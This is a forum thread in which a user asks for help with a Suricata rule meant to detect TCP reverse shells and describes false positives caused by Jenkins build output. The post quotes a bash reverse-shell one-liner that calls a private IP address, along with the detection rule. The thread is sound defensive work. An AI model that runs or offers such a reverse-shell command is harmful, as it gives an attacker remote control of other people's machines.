TCP reverse shell detection

CrashZz · October 28, 2022, 3:41am

Hi guys,i’m trying to use suricata to detect tcp reverse shell actions such as:

/bin/bash -i 0>& /dec/tcp/192.168.111.222/333 0>&1

My rule looks like this:

alert tcp any any -> any any (msg:"TCP reverse shell detection."; flow: established; pcre:"/root@.+(#|$)/i"; tcp.hdr; offset: 20; depth: 4; content:"|01 01 08 0a|"; sid: 1; rev: 1;)

Sometimes it really takes effect,at the same time it results in a significant number of false positives.I collected some pcaps and Jenkins turn out to be the culprit.

[root@localhost demo]# docker build -t demo:2.0 .
Sending build context to Docker daemon  17.57MB
Step 1/4 : FROM openjdk:8-jdk-alpine
 ---&gt; a3562aa0b991
Step 2/4 : VOLUME /tmp
 ---&gt; Using cache
 ---&gt; a98cf1fbeb9d
Step 3/4 : ADD ./demojenkins.jar demojenkins.jar
 ---&gt; 12bfc15e5295
Step 4/4 : ENTRYPOINT ['java','-jar','/demojenkins.jar', '&']
 ---&gt; Running in 2908dd94dfa7
Removing intermediate container 2908dd94dfa7
 ---&gt; 3041db93b6df
Successfully built 3041db93b6df
Successfully tagged demo:2.0

Could anyone give me some advice,appreciate it.

vjulien · November 1, 2022, 1:47pm

Might help to capture the traffic and inspect the pcap to see if the traffic pattern in the rule is present.

Topic		Replies	Views
Unexpected TCP session tracking Help suricata	18	129	September 2, 2024
Reverse Shell detection Rules	20	4910	August 27, 2021
Testing ssh related rules Rules rules	1	252	April 4, 2024
SSH alert direction Rules	7	1117	October 10, 2023
Suricata not detecting some packets in a pcap Help rules , suricata , pcaps	4	733	August 10, 2023

TCP reverse shell detection

Related topics